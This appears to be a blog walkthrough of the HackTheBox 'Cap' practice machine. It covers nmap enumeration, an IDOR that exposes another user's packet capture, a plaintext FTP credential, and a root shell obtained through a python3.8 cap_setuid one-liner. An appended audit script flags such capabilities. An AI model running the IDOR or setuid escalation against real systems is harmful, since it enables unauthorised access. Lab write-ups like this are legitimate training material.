July 5, 2026
CAP (HackTheBox Easy Machine)
How I pwned HackTheBox Cap using IDOR and a Python privilege escalation

By Eduardo Mafezoli
2 min read
About
Cap is an easy difficulty Linux machine running an HTTP server that performs administrative functions including performing network captures. Improper controls result in Insecure Direct Object Reference (IDOR) giving access to another user's capture. The capture contains plaintext credentials and can be used to gain foothold. A Linux capability is then leveraged to escalate to root.
Recon & Enumeration
I began using nmap to enumerate the services on the target.
sudo nmap -sC -sV 10.129.113.149 -Pn
Starting Nmap 7.99 ( https://nmap.org ) at 2026-07-04 15:01 -0400
Nmap scan report for 10.129.113.149
Host is up (0.27s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
| 256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_ 256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open http Gunicorn
|_http-title: Security Dashboard
|_http-server-header: gunicorn
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.09 seconds

After the nmap scan I accessed the website for further enumeration.
I saw that the website has a data directory serving a downloadable pcap file.
Since data/1/ didn't contain anything useful, I tried an IDOR attack, changing the ID in the path to find other users' data files.
The attack worked: data/0/ returned the admin's pcap file.
User Flag
After downloading the file I examined it in Wireshark.
Looking through the FTP traffic in the capture I discovered a credential:
nathan:Buck3tH4TF0RM3!

Using these credentials on FTP I got the user.txt file.
Privilege Escalation
I used the same credentials to log in over SSH.
I enumerated the system for privilege escalation paths and found that the standard SUID binaries were not vulnerable. I then checked for Linux file capabilities using:
getcap -r / 2>/dev/null

The output revealed a critical misconfiguration:
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

The cap_setuid capability allows the Python interpreter to change the process UID to any user, including root (UID 0), without requiring a password.
I exploited this by executing:
python3.8 -c "import os; os.setuid(0); os.system('/bin/bash')"

I gained root access and retrieved the flag from /root/root.txt:
dd7c13b92b4b64ff3c50f8b14005ec6d
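As an added example (not part of the original write-up), here is a small Python audit for the misconfiguration above: it parses getcap -r / output in both the older "path = caps+eip" and the newer libcap "path caps=eip" formats and flags binaries holding identity-changing capabilities, rating interpreters and shells such as the python3.8 entry as critical. The sample lines other than the python3.8 entry are constructed for the demonstration.

```python
import re

# Capabilities that change identity or bypass file permissions; on a binary
# that runs caller-supplied code they are root-equivalent.
DANGEROUS_CAPS = {"cap_setuid", "cap_setgid", "cap_dac_override",
                  "cap_dac_read_search", "cap_sys_admin", "cap_sys_ptrace"}
# Interpreters and shells: any dangerous cap here is rated critical.
INTERPRETER_RE = re.compile(r"/(python|perl|ruby|php|node|bash|sh|dash|zsh)[0-9.]*$")
# Older getcap prints "path = caps+eip"; libcap 2.41+ prints "path caps=eip".
LINE_RE = re.compile(r"^(?P<path>/\S*)\s+(?:= )?(?P<caps>\S.*)$")
CLAUSE_RE = re.compile(r"^([\w,]*)([+=-])([eip]*)$")

def parse_getcap_line(line):
    """Return (path, caps present in the effective or permitted set), or None."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    caps = set()
    for clause in m.group("caps").split():
        c = CLAUSE_RE.match(clause)
        if not c:
            return None
        names, op, flags = c.groups()
        if op == "-" or not ("e" in flags or "p" in flags):
            continue  # removed or inheritable-only: not usable by this binary
        caps.update({"all"} if names in ("", "all") else names.split(","))
    return m.group("path"), caps

def audit(getcap_output):
    """Return (path, dangerous caps, severity) for every risky entry in the output."""
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        hits = ["all"] if "all" in caps else sorted(caps & DANGEROUS_CAPS)
        if hits:
            severity = "critical" if INTERPRETER_RE.search(path) else "high"
            findings.append((path, hits, severity))
    return findings

# Constructed sample: line 2 is the entry from the Cap machine; the others are
# made up to exercise both output formats and a benign capability.
SAMPLE = """\
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/python3.8 cap_setuid,cap_net_bind_service=eip
/opt/helper =ep
"""
```

To check a real host, pass the text of getcap -r / 2>/dev/null to audit() instead of SAMPLE.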